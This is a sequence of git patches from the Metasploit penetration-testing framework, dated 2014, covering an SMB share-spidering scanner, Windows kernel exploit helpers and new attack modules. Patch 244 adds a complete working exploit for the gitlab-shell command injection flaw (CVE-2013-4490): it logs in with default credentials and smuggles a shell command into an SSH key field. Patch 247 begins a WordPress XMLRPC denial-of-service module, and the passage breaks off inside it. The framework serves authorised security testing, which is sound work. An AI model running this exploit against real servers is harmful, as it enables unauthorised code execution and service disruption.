-                                                halDispatchTable + 0x4, 0)
+                                                haldispatchtable + 4, 0)
     session.railgun.ntdll.NtQueryIntervalProfile(1337, 4)
 
     unless is_system?
diff --git a/modules/exploits/windows/local/ms_ndproxy.rb b/modules/exploits/windows/local/ms_ndproxy.rb
index 47cb9bc48e..f2206e79ed 100644
--- a/modules/exploits/windows/local/ms_ndproxy.rb
+++ b/modules/exploits/windows/local/ms_ndproxy.rb
@@ -141,19 +141,19 @@ class Metasploit3 < Msf::Exploit::Local
     addresses['halDispatchTable'] = hal_dispatch_table
     vprint_good("HalDispatchTable found at 0x#{addresses['halDispatchTable'].to_s(16)}")
 
-    vprint_status('Getting the hal.dll Base Address...')
+    vprint_status('Getting the hal.dll base address...')
     hal_info = find_sys_base('hal.dll')
     if hal_info.nil?
-      vprint_error('Failed to disclose hal.dll Base Address')
+      vprint_error('Failed to disclose hal.dll base address')
       return nil
     end
     hal_base = hal_info[0]
-    vprint_good("hal.dll Base Address disclosed at 0x#{hal_base.to_s(16)}")
+    vprint_good("hal.dll base address disclosed at 0x#{hal_base.to_s(16)}")
 
     hali_query_system_information = hal_base + t['HaliQuerySystemInfo']
     addresses['HaliQuerySystemInfo'] = hali_query_system_information
 
-    vprint_good("HaliQuerySystemInfo Address disclosed at 0x#{addresses['HaliQuerySystemInfo'].to_s(16)}")
+    vprint_good("HaliQuerySystemInfo address disclosed at 0x#{addresses['HaliQuerySystemInfo'].to_s(16)}")
     addresses
   end
 

From da845c7e89b2b76ee359c1ba5cec8ba130916065 Mon Sep 17 00:00:00 2001
From: Alton Johnson <alton.jx@gmail.com>
Date: Mon, 4 Aug 2014 18:06:35 -0500
Subject: [PATCH 241/321] Changed default VERBOSE option to false.

---
 modules/auxiliary/scanner/smb/smb_enumshares.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/auxiliary/scanner/smb/smb_enumshares.rb b/modules/auxiliary/scanner/smb/smb_enumshares.rb
index af4d1ab916..cb9e576f9e 100644
--- a/modules/auxiliary/scanner/smb/smb_enumshares.rb
+++ b/modules/auxiliary/scanner/smb/smb_enumshares.rb
@@ -46,7 +46,7 @@ class Metasploit3 < Msf::Auxiliary
     register_options(
       [
         OptBool.new('SpiderShares',      [false, 'Spider shares recursively', false]),
-        OptBool.new('VERBOSE',        [true, 'Show detailed information when spidering', true]),
+        OptBool.new('VERBOSE',        [true, 'Show detailed information when spidering', false]),
         OptBool.new('SpiderProfiles',  [false, 'Spider only user profiles when share = C$', true]),
         OptEnum.new('LogSpider',      [false, '0 = disabled, 1 = CSV, 2 = table (txt), 3 = one liner (txt)', 3, [0,1,2,3]]),
         OptInt.new('MaxDepth',      [true, 'Max number of subdirectories to spider', 999]),

From 77bba6e4ee735e12a1299d9733b55d6dd7da460c Mon Sep 17 00:00:00 2001
From: byt3bl33d3r <byt3bl33d3r@gmail.com>
Date: Tue, 5 Aug 2014 09:38:33 +0200
Subject: [PATCH 242/321] fixed msfcli with missing require

---
 lib/rex/exploitation/powershell/script.rb | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/lib/rex/exploitation/powershell/script.rb b/lib/rex/exploitation/powershell/script.rb
index 0892b6b676..d793553cfb 100644
--- a/lib/rex/exploitation/powershell/script.rb
+++ b/lib/rex/exploitation/powershell/script.rb
@@ -1,6 +1,7 @@
 # -*- coding: binary -*-
 
 require 'rex'
+require 'forwardable'
 
 module Rex
 module Exploitation
@@ -13,7 +14,7 @@ module Powershell
     include Parser
     include Obfu
     # Pretend we are actually a string
-    extend Forwardable
+    extend ::Forwardable
     # In case someone messes with String we delegate based on its instance methods
     # eval %Q|def_delegators :@code, :#{::String.instance_methods[0..(String.instance_methods.index(:class)-1)].join(', :')}|
     def_delegators :@code, :each_line, :strip, :chars, :intern, :chr, :casecmp, :ascii_only?, :<, :tr_s,

From f520616730b137b2d3e1a9c01050925bb7376b46 Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Tue, 5 Aug 2014 19:20:11 -0500
Subject: [PATCH 243/321] This fixes a few things, see commit message for more
 info

This commit fixes the following:

1. Not handling eval_host()'s nil file return value, which can causes
   a NoMethodError at runtime due to various conditions.
2. Renames datastore option VERBOSE to ShowFiles to pass msftidy
3. Avoids overwriting datastore options directly to pass msftidy
---
 .../auxiliary/scanner/smb/smb_enumshares.rb   | 32 +++++++++++--------
 1 file changed, 18 insertions(+), 14 deletions(-)

diff --git a/modules/auxiliary/scanner/smb/smb_enumshares.rb b/modules/auxiliary/scanner/smb/smb_enumshares.rb
index cb9e576f9e..2a268bcd0b 100644
--- a/modules/auxiliary/scanner/smb/smb_enumshares.rb
+++ b/modules/auxiliary/scanner/smb/smb_enumshares.rb
@@ -46,7 +46,7 @@ class Metasploit3 < Msf::Auxiliary
     register_options(
       [
         OptBool.new('SpiderShares',      [false, 'Spider shares recursively', false]),
-        OptBool.new('VERBOSE',        [true, 'Show detailed information when spidering', false]),
+        OptBool.new('ShowFiles',        [true, 'Show detailed information when spidering', false]),
         OptBool.new('SpiderProfiles',  [false, 'Spider only user profiles when share = C$', true]),
         OptEnum.new('LogSpider',      [false, '0 = disabled, 1 = CSV, 2 = table (txt), 3 = one liner (txt)', 3, [0,1,2,3]]),
         OptInt.new('MaxDepth',      [true, 'Max number of subdirectories to spider', 999]),
@@ -188,7 +188,7 @@ class Metasploit3 < Msf::Auxiliary
     rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e
       if e.error_code == 0xC00000BB
         vprint_error("#{ip}:#{rport} - Got 0xC00000BB while enumerating shares, switching to srvsvc...")
-        datastore['USE_SRVSVC_ONLY'] = true # Make sure the module is aware of this state
+        @srvsvc = true # Make sure the module is aware of this state
         return srvsvc_netshareenum(ip)
       end
     end
@@ -287,6 +287,8 @@ class Metasploit3 < Msf::Auxiliary
 
     begin
       read,write,type,files = eval_host(ip, share, base)
+      # files or type could return nil due to various conditions
+      return dirs if files.nil?
       files.each do |f|
         if f[0] != "." and f[0] != ".."
           usernames.push(f[0])
@@ -299,7 +301,6 @@ class Metasploit3 < Msf::Auxiliary
       end
       return dirs
     rescue
-      dirs = nil
       return dirs
     end
   end
@@ -309,7 +310,7 @@ class Metasploit3 < Msf::Auxiliary
     new_dirs = ['Desktop','Documents','Downloads','Music','Pictures','Videos']
 
     dirs = get_user_dirs(ip, share, "Documents and Settings", old_dirs)
-    if dirs == nil
+    if dirs.blank?
       dirs = get_user_dirs(ip, share, "Users", new_dirs)
     end
     return dirs
@@ -334,7 +335,7 @@ class Metasploit3 < Msf::Auxiliary
       if x == "ADMIN$" or x == "IPC$"
         next
       end
-      if not datastore['VERBOSE']
+      if not datastore['ShowFiles']
         print_status("#{ip}:#{rport} - Spidering #{x}.")
       end
       subdirs = [""]
@@ -403,11 +404,11 @@ class Metasploit3 < Msf::Auxiliary
 
             end
           end
-          vprint_good(pretty_tbl.to_s)
+          print_good(pretty_tbl.to_s) if datastore['ShowFiles']
         end
         subdirs.shift
       end
-    print_status("#{ip}:#{rport} - Spider #{x} complete.") unless datastore['VERBOSE'] == true
+    print_status("#{ip}:#{rport} - Spider #{x} complete.") unless datastore['ShowFiles'] == true
     end
     unless detailed_tbl.rows.empty?
       if datastore['LogSpider'] == '1'
@@ -423,12 +424,14 @@ class Metasploit3 < Msf::Auxiliary
     end
   end
 
-  def cleanup
-    datastore['RPORT']           = @rport
-    datastore['SMBDirect']       = @smb_redirect
-    datastore['USE_SRVSVC_ONLY'] = @srvsvc
+  def rport
+    @rport || datastore['RPORT']
   end
 
+  # Overrides the one in smb.rb
+  def smb_direct
+    @smb_redirect || datastore['SMBDirect']
+  end
 
   def run_host(ip)
     @rport        = datastore['RPORT']
@@ -437,13 +440,13 @@ class Metasploit3 < Msf::Auxiliary
     shares        = []
 
     [[139, false], [445, true]].each do |info|
-      datastore['RPORT']     = info[0]
-      datastore['SMBDirect'] = info[1]
+      @rport        = info[0]
+      @smb_redirect = info[1]
 
       begin
         connect
         smb_login
-        if datastore['USE_SRVSVC_ONLY']
+        if @srvsvc
           shares = srvsvc_netshareenum(ip)
         else
           shares = lanman_netshareenum(ip, rport, info)
@@ -506,3 +509,4 @@ class Metasploit3 < Msf::Auxiliary
     end
   end
 end
+

From 48359faaaf5b5e05c605059c84f66b5cf2fa869c Mon Sep 17 00:00:00 2001
From: kaospunk <github@bmkdirect.com>
Date: Tue, 5 Aug 2014 23:21:57 -0400
Subject: [PATCH 244/321] Add gitlab-shell command injection module

This request adds a module for gitlab-shell command
injection for versions prior to 1.7.4. This has been
tested by installing version 7.1.1 on Ubuntu and then
using information at http://intelligentexploit.com/view-details.html?id=17746
to modify the version of gitlab-shell to a vulnerable one. This
was done as I could not find a better method for downloading
and deploying an older, vulnerable version of Gitlab.
---
 .../exploits/multi/http/gitlab_shell_exec.rb  | 199 ++++++++++++++++++
 1 file changed, 199 insertions(+)
 create mode 100644 modules/exploits/multi/http/gitlab_shell_exec.rb

diff --git a/modules/exploits/multi/http/gitlab_shell_exec.rb b/modules/exploits/multi/http/gitlab_shell_exec.rb
new file mode 100644
index 0000000000..836beb8044
--- /dev/null
+++ b/modules/exploits/multi/http/gitlab_shell_exec.rb
@@ -0,0 +1,199 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'net/ssh'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Gitlab-shell Code Execution',
+      'Description'    => %q(
+          This module takes advantage of the addition of authorized
+          ssh keys in the gitlab-shell functionality of Gitlab. Versions
+          of gitlab-shell prior to 1.7.4 used the ssh key provided directly
+          in a system call resulting in a command injection vulnerability. As
+          this relies on adding an ssh key to an account valid credentials
+          are required to exploit this vulnerability.
+      ),
+      'Author'  =>
+        [
+          'Brandon Knight'
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          ['URL', 'https://about.gitlab.com/2013/11/04/gitlab-ce-6-2-and-5-4-security-release/'],
+          ['CVE', '2013-4490']
+        ],
+      'Platform'  => 'linux',
+      'Targets'        =>
+        [
+          ['Linux', {
+            'Platform' => 'linux',
+            'Arch' => ARCH_X86
+          }],
+          ['Linux (x64)', {
+            'Platform' => 'linux',
+            'Arch' => ARCH_X86_64
+          }],
+          ['Unix (CMD)', {
+            'Platform' => 'unix',
+            'Arch' => ARCH_CMD,
+            'Payload' =>
+                {
+                  'Compat'      => {
+                    'RequiredCmd' => 'perl python ruby openssl netcat'
+                  }
+                }
+
+          }]
+        ],
+      'CmdStagerFlavor' => %w( bourne printf ),
+      'DisclosureDate' => 'Nov 4 2013',
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        OptString.new('USERNAME',  [true, 'The username to authenticate as', 'root']),
+        OptString.new('PASSWORD',  [true, 'The password for the specified username', '5iveL!fe']),
+        OptString.new('TARGETURI', [true,  'The path to Gitlab', '/'])
+      ], self.class)
+  end
+
+  def exploit
+    if target.name == 'Unix (CMD)'
+      execute_command(payload.encoded)
+    else
+      execute_cmdstager(temp: './', linemax: 2800)
+    end
+  end
+
+  def execute_command(cmd, _opts = {})
+    session_cookie = login
+    key_id = add_key(session_cookie, cmd)
+    delete_key(session_cookie, key_id)
+  end
+
+  def login
+    username = datastore['USERNAME']
+    password = datastore['PASSWORD']
+    signin_page = datastore['TARGETURI'] + 'users/sign_in'
+
+    # Get a valid session cookie and authenticity_token for the next step
+    res = send_request_cgi(
+                            'method' => 'GET',
+                            'cookie' => 'request_method=GET',
+                            'uri'    => signin_page
+    )
+
+    fail_with(Failure::Unknown, "#{peer} - Connection timed out during login") unless res
+
+    session_cookie = res.get_cookies.scan(/(_gitlab_session=[a-z0-9]+)/).flatten[0] || ''
+    auth_token = res.body.scan(/<input name="authenticity_token" type="hidden" value="(.*?)"/).flatten[0]
+
+    # Perform the actual login and get the newly assigned session cookie
+    res = send_request_cgi(
+                            'method' => 'POST',
+                            'cookie' => session_cookie,
+                            'uri'    => signin_page,
+                            'vars_post' =>
+                              {
+                                'utf8' => "\xE2\x9C\x93",
+                                'authenticity_token' => auth_token,
+                                'user[login]' => username,
+                                'user[password]' => password,
+                                'user[remember_me]' => 0
+                              }
+                          )
+
+    fail_with(Failure::NoAccess, "#{peer} - Login failed") unless res
+
+    session_cookie = res.get_cookies.scan(/(_gitlab_session=[a-z0-9]+)/).flatten[0]
+
+    session_cookie
+  end
+
+  def add_key(session_cookie, cmd)
+    add_key_base = datastore['TARGETURI'] + 'profile/keys'
+
+    # Perform an initial request to get an authenticity_token so the actual
+    # key addition can be done successfully.
+    res = send_request_cgi(
+                            'method' => 'GET',
+                            'cookie' => "request_method=GET; #{session_cookie}",
+                            'uri'    => add_key_base + '/new'
+    )
+
+    fail_with(Failure::Unknown, "#{peer} - Connection timed out during request") unless res
+
+    auth_token = res.body.scan(/<input name="authenticity_token" type="hidden" value="(.*?)"/).flatten[0]
+    title = rand_text_alphanumeric(16)
+    key_info = rand_text_alphanumeric(6)
+
+    # Generate a random ssh key
+    key = OpenSSL::PKey::RSA.new 2048
+    type = key.ssh_type
+    data = [key.to_blob].pack('m0')
+
+    openssh_format = "#{type} #{data}"
+
+    # Place the payload in to the key information to perform the command injection
+    key = "#{openssh_format} #{key_info}';#{cmd}; echo '"
+
+    res = send_request_cgi(
+                            'method' => 'POST',
+                            'cookie' => "request_method=GET; #{session_cookie}",
+                            'uri'    => add_key_base,
+                            'vars_post' =>
+                              {
+                                'utf8' => "\xE2\x9C\x93",
+                                'authenticity_token' => auth_token,
+                                'key[title]' => title,
+                                'key[key]' => key
+                              }
+                          )
+
+    fail_with(Failure::Unknown, "#{peer} - Request to add key failed") unless res
+
+    # Get the newly added key id so it can be used for cleanup
+    key_id = res.headers['Location'].split('/')[-1]
+
+    key_id
+  end
+
+  def delete_key(session_cookie, key_id)
+    key_base = datastore['TARGETURI'] + 'profile/keys'
+
+    res = send_request_cgi(
+                             'method' => 'GET',
+                             'cookie' => "request_method=GET; #{session_cookie}",
+                             'uri'    => key_base
+                           )
+
+    fail_with(Failure::Unknown, "#{peer} - Connection timed out during request") unless res
+
+    auth_token = res.body.scan(/<meta content="(.*?)" name="csrf-token"/).flatten[0]
+
+    # Remove the key which was added to clean up after ourselves
+    res = send_request_cgi(
+                             'method' => 'POST',
+                             'cookie' => "#{session_cookie}",
+                             'uri'    => "#{key_base}/#{key_id}",
+                             'vars_post' =>
+                             {
+                               '_method' => 'delete',
+                               'authenticity_token' => auth_token
+                             }
+                           )
+
+    fail_with(Failure::Unknown, "#{peer} - Request to delete key failed") unless res
+  end
+end

From b602e474541021d6e0e89c0b84d02204895dc3e2 Mon Sep 17 00:00:00 2001
From: Spencer McIntyre <zeroSteiner@gmail.com>
Date: Tue, 5 Aug 2014 21:24:37 -0700
Subject: [PATCH 245/321] Implement improvements based on feedback

---
 lib/msf/core/exploit/local/windows_kernel.rb  | 64 ++++++++++---------
 lib/msf/core/post/windows/error.rb            |  2 +-
 .../stdapi/railgun/def/def_psapi.rb           | 32 ++++++++++
 .../extensions/stdapi/railgun/railgun.rb      |  3 +-
 .../windows/local/novell_client_nicm.rb       | 26 --------
 .../windows/local/novell_client_nwfs.rb       | 26 --------
 6 files changed, 69 insertions(+), 84 deletions(-)
 create mode 100644 lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_psapi.rb

diff --git a/lib/msf/core/exploit/local/windows_kernel.rb b/lib/msf/core/exploit/local/windows_kernel.rb
index 110008fc57..cb9e991d16 100644
--- a/lib/msf/core/exploit/local/windows_kernel.rb
+++ b/lib/msf/core/exploit/local/windows_kernel.rb
@@ -2,6 +2,9 @@
 
 module Msf
 module Exploit::Local::WindowsKernel
+  include Msf::PostMixin
+  include Msf::Post::Windows::Error
+
   #
   # Find the address of nt!HalDispatchTable.
   #
@@ -10,25 +13,29 @@ module Exploit::Local::WindowsKernel
   #
   def find_haldispatchtable
     kernel_info = find_sys_base(nil)
+    if kernel_info.nil?
+      print_error("Failed to find the address of the Windows kernel")
+      return nil
+    end
     vprint_status("Kernel Base Address: 0x#{kernel_info[0].to_s(16)}")
 
     h_kernel = session.railgun.kernel32.LoadLibraryExA(kernel_info[1], 0, 1)
     if h_kernel['return'] == 0
-      print_error("Failed to load #{kernel_info[1]} (error: #{h_kernel['GetLastError']})")
+      print_error("Failed to load #{kernel_info[1]} (error: #{h_kernel['GetLastError']} #{h_kernel['ErrorMessage']})")
       return nil
     end
     h_kernel = h_kernel['return']
 
     hal_dispatch_table = session.railgun.kernel32.GetProcAddress(h_kernel, 'HalDispatchTable')
     if hal_dispatch_table['return'] == 0
-      print_error("Failed to retrieve the address of nt!HalDispatchTable (error: #{hal_dispatch_table['GetLastError']})")
+      print_error("Failed to retrieve the address of nt!HalDispatchTable (error: #{hal_dispatch_table['GetLastError']} #{hal_dispatch_table['ErrorMessage']})")
       return nil
     end
     hal_dispatch_table = hal_dispatch_table['return']
 
     hal_dispatch_table -= h_kernel
     hal_dispatch_table += kernel_info[0]
-    vprint_status("HalDisPatchTable Address: 0x#{hal_dispatch_table.to_s(16)}")
+    vprint_status("HalDispatchTable Address: 0x#{hal_dispatch_table.to_s(16)}")
     hal_dispatch_table
   end
 
@@ -41,34 +48,31 @@ module Exploit::Local::WindowsKernel
   # @return [nil] If the name specified could not be found.
   #
   def find_sys_base(drvname)
-    unless session.railgun.dlls.keys.include?('psapi')
-      session.railgun.add_dll('psapi')
-      session.railgun.add_function(
-        'psapi',
-        'EnumDeviceDrivers',
-        'BOOL',
-        [
-          %w(PBLOB lpImageBase out),
-          %w(DWORD cb in),
-          %w(PDWORD lpcbNeeded out)
-        ])
-      session.railgun.add_function(
-        'psapi',
-        'GetDeviceDriverBaseNameA',
-        'DWORD',
-        [
-          %w(LPVOID ImageBase in),
-          %w(PBLOB lpBaseName out),
-          %w(DWORD nSize in)
-        ])
+    if sysinfo['Architecture'] =~ /(x86|wow64)/i
+      ptr_size = 4
+    else
+      ptr_size = 8
     end
 
-    results = session.railgun.psapi.EnumDeviceDrivers(4096, 1024, 4)
-    addresses = results['lpImageBase'][0..results['lpcbNeeded'] - 1].unpack('V*')
+    results = session.railgun.psapi.EnumDeviceDrivers(0, 0, ptr_size)
+    unless results['return']
+      print_error("EnumDeviceDrivers failed (error: #{results['GetLastError']} #{results['ErrorMessage']})")
+      return nil
+    end
+    results = session.railgun.psapi.EnumDeviceDrivers(results['lpcbNeeded'], results['lpcbNeeded'], ptr_size)
+    unless results['return']
+      print_error("EnumDeviceDrivers failed (error: #{results['GetLastError']} #{results['ErrorMessage']})")
+      return nil
+    end
+    addresses = results['lpImageBase'][0..results['lpcbNeeded'] - 1].unpack((ptr_size == 4 ? 'V' : 'Q') + '*')
 
     addresses.each do |address|
       results = session.railgun.psapi.GetDeviceDriverBaseNameA(address, 48, 48)
-      current_drvname = results['lpBaseName'][0..results['return'] - 1]
+      if results['return'] == 0
+        print_error("GetDeviceDriverBaseNameA failed (error: #{results['GetLastError']} #{results['ErrorMessage']})")
+        return nil
+      end
+      current_drvname = results['lpBaseName'][0,results['return']]
       if drvname.nil?
         if current_drvname.downcase.include?('krnl')
           return [address, current_drvname]
@@ -94,16 +98,16 @@ module Exploit::Local::WindowsKernel
   #
   def open_device(file_name, desired_access, share_mode, creation_disposition, flags_and_attributes = 0)
     handle = session.railgun.kernel32.CreateFileA(file_name, desired_access, share_mode, nil, creation_disposition, flags_and_attributes, nil)
-    if handle['return'] == 0xffffffff
-      print_error("Failed to open the #{file_name} device (error: #{handle['GetLastError']})")
+    if handle['return'] == INVALID_HANDLE_VALUE
+      print_error("Failed to open the #{file_name} device (error: #{handle['GetLastError']} #{handle['ErrorMessage']})")
       return nil
     end
     handle['return']
   end
 
   #
-  # Generate x86 token stealing shellcode suitable for use when overwriting the
-  # pointer at nt!HalDispatchTable+0x4. The shellcode preserves the edx and ebx
+  # Generate token stealing shellcode suitable for use when overwriting the
+  # HaliQuerySystemInformation pointer. The shellcode preserves the edx and ebx
   # registers.
   #
   # @param target [Hash] The target information containing the offsets to _KPROCESS,
diff --git a/lib/msf/core/post/windows/error.rb b/lib/msf/core/post/windows/error.rb
index 6557d729a1..cd650c5f58 100644
--- a/lib/msf/core/post/windows/error.rb
+++ b/lib/msf/core/post/windows/error.rb
@@ -2527,5 +2527,5 @@ module Msf::Post::Windows::Error
   SYSTEM_DEVICE_NOT_FOUND = 0x3BC3
   HASH_NOT_SUPPORTED = 0x3BC4
   HASH_NOT_PRESENT = 0x3BC5
-
+  INVALID_HANDLE_VALUE = 0xffffffff
 end
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_psapi.rb b/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_psapi.rb
new file mode 100644
index 0000000000..36b59c6d48
--- /dev/null
+++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_psapi.rb
@@ -0,0 +1,32 @@
+# -*- coding: binary -*-
+module Rex
+module Post
+module Meterpreter
+module Extensions
+module Stdapi
+module Railgun
+module Def
+
+class Def_psapi
+
+  def self.create_dll(dll_path = 'psapi')
+    dll = DLL.new(dll_path, ApiConstants.manager)
+
+    dll.add_function('EnumDeviceDrivers', 'BOOL',[
+      %w(PBLOB lpImageBase out),
+      %w(DWORD cb in),
+      %w(PDWORD lpcbNeeded out)
+    ])
+
+    dll.add_function('GetDeviceDriverBaseNameA', 'DWORD', [
+      %w(LPVOID ImageBase in),
+      %w(PBLOB lpBaseName out),
+      %w(DWORD nSize in)
+    ])
+
+    return dll
+  end
+
+end
+
+end; end; end; end; end; end; end
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/railgun/railgun.rb b/lib/rex/post/meterpreter/extensions/stdapi/railgun/railgun.rb
index 0d6642011f..b045b6b270 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/railgun/railgun.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun/railgun.rb
@@ -78,7 +78,8 @@ class Railgun
     'crypt32',
     'wlanapi',
     'wldap32',
-    'version'
+    'version',
+    'psapi'
   ].freeze
 
   ##
diff --git a/modules/exploits/windows/local/novell_client_nicm.rb b/modules/exploits/windows/local/novell_client_nicm.rb
index a219d3905b..6a1259861b 100644
--- a/modules/exploits/windows/local/novell_client_nicm.rb
+++ b/modules/exploits/windows/local/novell_client_nicm.rb
@@ -66,28 +66,6 @@ class Metasploit3 < Msf::Exploit::Local
 
   end
 
-  def add_railgun_functions
-    session.railgun.add_dll('psapi') if not session.railgun.dlls.keys.include?('psapi')
-    session.railgun.add_function(
-      'psapi',
-      'EnumDeviceDrivers',
-      'BOOL',
-      [
-        ["PBLOB", "lpImageBase", "out"],
-        ["DWORD", "cb", "in"],
-        ["PDWORD", "lpcbNeeded", "out"]
-      ])
-    session.railgun.add_function(
-      'psapi',
-      'GetDeviceDriverBaseNameA',
-      'DWORD',
-      [
-        ["LPVOID", "ImageBase", "in"],
-        ["PBLOB", "lpBaseName", "out"],
-        ["DWORD", "nSize", "in"]
-      ])
-  end
-
   def open_device(dev)
 
     invalid_handle_value = 0xFFFFFFFF
@@ -163,10 +141,6 @@ class Metasploit3 < Msf::Exploit::Local
   end
 
   def exploit
-
-    vprint_status("Adding the railgun stuff...")
-    add_railgun_functions
-
     if sysinfo["Architecture"] =~ /wow64/i
       fail_with(Failure::NoTarget, "Running against WOW64 is not supported")
     elsif sysinfo["Architecture"] =~ /x64/
diff --git a/modules/exploits/windows/local/novell_client_nwfs.rb b/modules/exploits/windows/local/novell_client_nwfs.rb
index ac5f8f5407..90567648de 100644
--- a/modules/exploits/windows/local/novell_client_nwfs.rb
+++ b/modules/exploits/windows/local/novell_client_nwfs.rb
@@ -62,28 +62,6 @@ class Metasploit3 < Msf::Exploit::Local
 
   end
 
-  def add_railgun_functions
-    session.railgun.add_dll('psapi') if not session.railgun.dlls.keys.include?('psapi')
-    session.railgun.add_function(
-      'psapi',
-      'EnumDeviceDrivers',
-      'BOOL',
-      [
-        ["PBLOB", "lpImageBase", "out"],
-        ["DWORD", "cb", "in"],
-        ["PDWORD", "lpcbNeeded", "out"]
-      ])
-    session.railgun.add_function(
-      'psapi',
-      'GetDeviceDriverBaseNameA',
-      'DWORD',
-      [
-        ["LPVOID", "ImageBase", "in"],
-        ["PBLOB", "lpBaseName", "out"],
-        ["DWORD", "nSize", "in"]
-      ])
-  end
-
   def open_device(dev)
 
     invalid_handle_value = 0xFFFFFFFF
@@ -219,10 +197,6 @@ class Metasploit3 < Msf::Exploit::Local
 
 
   def exploit
-
-    vprint_status("Adding the railgun stuff...")
-    add_railgun_functions
-
     if sysinfo["Architecture"] =~ /wow64/i
       fail_with(Failure::NoTarget, "Running against WOW64 is not supported")
     elsif sysinfo["Architecture"] =~ /x64/

From 2ed02c30a8cad4f397ce7da4c9898d22a6606466 Mon Sep 17 00:00:00 2001
From: Spencer McIntyre <zeroSteiner@gmail.com>
Date: Tue, 5 Aug 2014 21:34:36 -0700
Subject: [PATCH 246/321] Use better variable names instad of an array

---
 lib/msf/core/exploit/local/windows_kernel.rb | 16 ++++++++--------
 1 file changed, 8 insertions(+), 8 deletions(-)

diff --git a/lib/msf/core/exploit/local/windows_kernel.rb b/lib/msf/core/exploit/local/windows_kernel.rb
index cb9e991d16..5917334220 100644
--- a/lib/msf/core/exploit/local/windows_kernel.rb
+++ b/lib/msf/core/exploit/local/windows_kernel.rb
@@ -12,16 +12,16 @@ module Exploit::Local::WindowsKernel
   # @return [nil] If the address could not be found.
   #
   def find_haldispatchtable
-    kernel_info = find_sys_base(nil)
-    if kernel_info.nil?
+    kernel_address, kernel_name = find_sys_base(nil)
+    if kernel_address.nil? || kernel_name.nil?
       print_error("Failed to find the address of the Windows kernel")
       return nil
     end
-    vprint_status("Kernel Base Address: 0x#{kernel_info[0].to_s(16)}")
+    vprint_status("Kernel Base Address: 0x#{kernel_address.to_s(16)}")
 
-    h_kernel = session.railgun.kernel32.LoadLibraryExA(kernel_info[1], 0, 1)
+    h_kernel = session.railgun.kernel32.LoadLibraryExA(kernel_name, 0, 1)
     if h_kernel['return'] == 0
-      print_error("Failed to load #{kernel_info[1]} (error: #{h_kernel['GetLastError']} #{h_kernel['ErrorMessage']})")
+      print_error("Failed to load #{kernel_name} (error: #{h_kernel['GetLastError']} #{h_kernel['ErrorMessage']})")
       return nil
     end
     h_kernel = h_kernel['return']
@@ -34,7 +34,7 @@ module Exploit::Local::WindowsKernel
     hal_dispatch_table = hal_dispatch_table['return']
 
     hal_dispatch_table -= h_kernel
-    hal_dispatch_table += kernel_info[0]
+    hal_dispatch_table += kernel_address
     vprint_status("HalDispatchTable Address: 0x#{hal_dispatch_table.to_s(16)}")
     hal_dispatch_table
   end
@@ -75,10 +75,10 @@ module Exploit::Local::WindowsKernel
       current_drvname = results['lpBaseName'][0,results['return']]
       if drvname.nil?
         if current_drvname.downcase.include?('krnl')
-          return [address, current_drvname]
+          return address, current_drvname
         end
       elsif drvname == current_drvname
-        return [address, current_drvname]
+        return address, current_drvname
       end
     end
   end

From d6e60453d667e7baad126c84bee2ec7c23cab8a4 Mon Sep 17 00:00:00 2001
From: Christian Mehlmauer <FireFart@gmail.com>
Date: Thu, 7 Aug 2014 11:38:44 +0200
Subject: [PATCH 247/321] Added Wordpress XMLRPC DoS

---
 lib/msf/http/wordpress/uris.rb                |  7 ++
 .../dos/http/wordpress_xmlrpc_dos.rb          | 87 +++++++++++++++++++
 2 files changed, 94 insertions(+)
 create mode 100644 modules/auxiliary/dos/http/wordpress_xmlrpc_dos.rb

diff --git a/lib/msf/http/wordpress/uris.rb b/lib/msf/http/wordpress/uris.rb
index 1060354113..cd7b3cc166 100644
--- a/lib/msf/http/wordpress/uris.rb
+++ b/lib/msf/http/wordpress/uris.rb
@@ -101,4 +101,11 @@ module Msf::HTTP::Wordpress::URIs
     normalize_uri(wordpress_url_wp_content, 'themes')
   end
 
+  # Returns the Wordpress XMLRPC URL
+  #
+  # @return [String] Wordpress XMLRPC URL
+  def wordpress_url_xmlrpc
+    normalize_uri(target_uri.path, 'xmlrpc.php')
+  end
+
 end
diff --git a/modules/auxiliary/dos/http/wordpress_xmlrpc_dos.rb b/modules/auxiliary/dos/http/wordpress_xmlrpc_dos.rb
new file mode 100644
index 0000000000..b6d33d3603
--- /dev/null
+++ b/modules/auxiliary/dos/http/wordpress_xmlrpc_dos.rb
@@ -0,0 +1,87 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+  include Msf::HTTP::Wordpress
+  include Msf::Auxiliary::Dos
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'          => 'Wordpress XMLRPC DoS',
+      'Description'   => %q{
+        Wordpress XMLRPC parsing is vulnerable to a XML based denial of service.
+        This vulnerability affects Wordpress 3.5 - 3.9.2 (3.8.4 and 3.7.4 are
+        also patched).
+      },
+      'Author'        =>
+        [
+          'Nir Goldshlager',    # advisory
+          'Christian Mehlmauer' # metasploit module
+        ],
+      'License'       => MSF_LICENSE,
+      'References'    =>
+        [
+          ['URL', 'http://wordpress.org/news/2014/08/wordpress-3-9-2/'],
+          ['URL', 'http://www.breaksec.com/?p=6362'],
+          ['URL', 'http://mashable.com/2014/08/06/wordpress-xml-blowup-dos/'],
+          ['URL', 'https://core.trac.wordpress.org/changeset/29404']
+        ],
+      'DisclosureDate'=> 'Aug 6 2014'
+    ))
+
+    register_options(
+    [
